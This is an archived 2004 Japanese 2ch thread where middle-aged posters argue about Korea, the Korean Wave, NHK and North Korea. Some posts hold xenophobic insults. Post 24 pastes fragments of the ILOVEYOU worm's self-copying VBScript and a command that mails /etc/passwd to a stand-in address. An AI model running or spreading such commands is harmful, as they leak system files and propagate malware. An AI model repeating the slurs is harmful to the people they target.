2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【親韓】40代が韓国について語る 第2幕【嫌韓】

1 :名無しさん@お腹いっぱい。:04/12/03 02:57:06
韓国ブームと言われる昨今、TVで見る限りでは40代が支えてるみたいだけど。
(ぺのおっかけ女性の平均年齢は47歳)
一方で、2ちゃんでは、嫌いな国の筆頭。そしてその2ちゃんは20代が主要層。
40代ならではの切り口も交えて、40代の語る韓国、どうぞ。

【親韓】40代が韓国について語る【嫌韓】
http://bubble2.2ch.net/test/read.cgi/cafe40/1091027414/
ハングル板
http://society3.2ch.net/korea/

2 :名無しさん@お腹いっぱい。:04/12/03 12:20:18
保守を兼て2ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!

3 :名無しさん@お腹いっぱい。:04/12/03 13:09:12
>>2
ちゃんと保守しろよ

4 :名無しさん@お腹いっぱい。:04/12/03 13:39:44
ソウルは都会だね。
空港も日本のどの空港よりも綺麗で大きく発達している。

5 :名無しさん@お腹いっぱい。:04/12/03 20:26:31
有名なソウルのバラック貧民街写真コピペ↓

6 :名無しさん@お腹いっぱい。:04/12/04 00:33:42
「冬ソナ」と「愛はかげろう」の比較を作ってやったぞ。

ヤバイんで、17時にはケスから早めにキケ。

http://ayarika.on.arena.ne.jp/source/sayueri_0852.mp3


NHKはこんなパクリやろうの歌を紅白に出そうとしてます

7 :名無しさん@お腹いっぱい。:04/12/04 20:28:59
age

8 :名無しさん@お腹いっぱい。:04/12/06 01:12:33
どんどん意見してね


教育板
【歴史】韓国ブームと学校教育【韓流】
http://school4.2ch.net/test/read.cgi/edu/1102261410/


9 :名無しさん@お腹いっぱい。:04/12/11 03:54:34
NHK、不祥事受けて19日に会長出演の特番「NHKに言いたい」放送へ

NHKは、海老沢勝二会長が生出演する特集番組「NHKに言いたい」を19日
午後9時〜11時、総合テレビで生放送すると発表。一連の不祥事に対する視聴者
の不信感をぬぐい公共放送の信頼回復を図るのが狙い。
「公共放送に問われているもの」や「受信料制度」などについてFaxやメール
で寄せられた批判、意見に海老沢会長が直接答える。
http://headlines.yahoo.co.jp/hl?a=20041210-00000243-kyodo-ent
----------------------------------------------------------------------

NHKは不祥事だけが反感を買っていると頑なに隠蔽してるが、韓国の不都合な
ニュースはスルーし、韓国ブームを押し付けている行為も反感を買っている。
メール、Faxをガンガンしてそれでも無視したらNHKは本当に腐っている。

さあ、19日はみんなでNHKにメール、Faxをどんどんしよう!


10 :名無しさん@お腹いっぱい。:04/12/13 16:43:46
age

11 :名無しさん@お腹いっぱい。:04/12/13 18:51:27
ペの公式HPはすごいことになってます。
乙女お婆が、ポエムとか投稿して。ヨン様カルト教ですね〜。
例の来日騒動事でも「ヨンジュンシ(ヨン様とは呼びたくないらしい。
「ssi」とつける人もいる。日本語の「氏」と同じような意味らしい)
は悪くない。」と言ってひたすら警察、ホテル関係者のせいにしてる。
「僕の家族(ファンをこう呼ぶらしい)は走ったりしない。」と甘い言葉を
狂信しているようです。10万人が日に5〜6回はパソコンを開いて、
スレ立てまくって、感情の垂れ流し。
似たような顔立ちなのに、異国の言葉を話すのが、枯れかけた性欲を
呼び起こすのか・・?このブームのせいで、好きだったビビンバも
嫌いになりそうです。

12 :名無しさん@お腹いっぱい。:04/12/13 22:14:16
在日のババァだろ。奴らにとって、ネイティブの美男子は王子様みたいなものだ。
狂ったようにキャーキャーいうのも当然。

13 :名無しさん@お腹いっぱい。:04/12/14 02:02:50
age

14 :名無しさん@お腹いっぱい。:04/12/15 03:13:34
オニ

15 :名無しさん@お腹いっぱい。:04/12/15 03:55:11
ババア

16 :名無しさん@お腹いっぱい。:04/12/15 09:33:16
でも、年が変わった途端嘘のように皆忘れるかも・・・・。


って、テレビで杉・・・・あきた。

17 :名無しさん@お腹いっぱい。:04/12/19 02:02:38
age

18 :名無しさん@お腹いっぱい。:04/12/19 02:04:49
http://f31.aaa.livedoor.jp/~jword/cgi/nevada/upload/src/nevada_0846.jpg






19 :名無しさん@お腹いっぱい。:04/12/19 02:06:01
韓国の北に対する「太陽政策」とやら?
ふざけんな!!
何が対話と誠意だ。
小泉も歴史に名を残したいだけのバカ。
ど素人ノムヒョンに媚びるなーーーーーーーーーっ。

20 :名無しさん@お腹いっぱい。:04/12/19 09:06:29
>>19
韓国は北朝鮮が崩壊しても飢えた人民を養い切れないんです。
停戦状態にある朝鮮戦争が再開したら一番被害を受けるのは韓国なんです。
脱北者の受け入れももう手一杯。
韓国の事情もわかってやれよ。
韓国にだって拉致被害者は400人以上、捕虜は500人以上。
韓国にだって問題はあるけど、それ以上に北朝鮮の崩壊が怖いんだよ。

21 :名無しさん@お腹いっぱい。:04/12/20 15:55:16


ついに公式見解キタ━━━━━(゚∀゚)━━━━━ !!!!!


「剣道の朝鮮起源は誰も否認できない歴史的事実」
http://tmp4.2ch.net/test/read.cgi/asia/1103509642/l50


22 :名無しさん@お腹いっぱい。:04/12/25 01:22:09
age

23 :名無しさん@お腹いっぱい。:04/12/25 13:33:40
親韓とかどうやったらなれるんだろう
韓国ドラマのファンになったら韓国に親しみをもつようになれるのか?
自分のまわりに良い韓国人がいっぱいいるとかか?

オレの場合はニュースサイトをまわるのが日課になったんで自然と嫌韓になっていった
反韓反日サイトの存在を知ったのも最近のことだよ
昔、旅行に1度いったがその時は好きでも嫌いでもなかったな
気にも留めなかった国の情報がネットで知る事ができるようになってからだ
韓国マスコミの異常な反日報道、韓国の政治家や文化人の奇妙な文化的優越意識、発言
オレのまわりに韓国ドラマのファンがいるが、いろいろ教えてやったら
みんな、りっぱな嫌韓呆韓になったよw

結論として2ちゃんに限らず、いろんな情報にふれる立場にいれば嫌韓になるのは必然

自分が親韓だと思ってる人たち、なぜそうなのかを教えてくれないかな
マジで知りたいんだ

24 :名無しさん@お腹いっぱい。:04/12/26 04:29:32
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)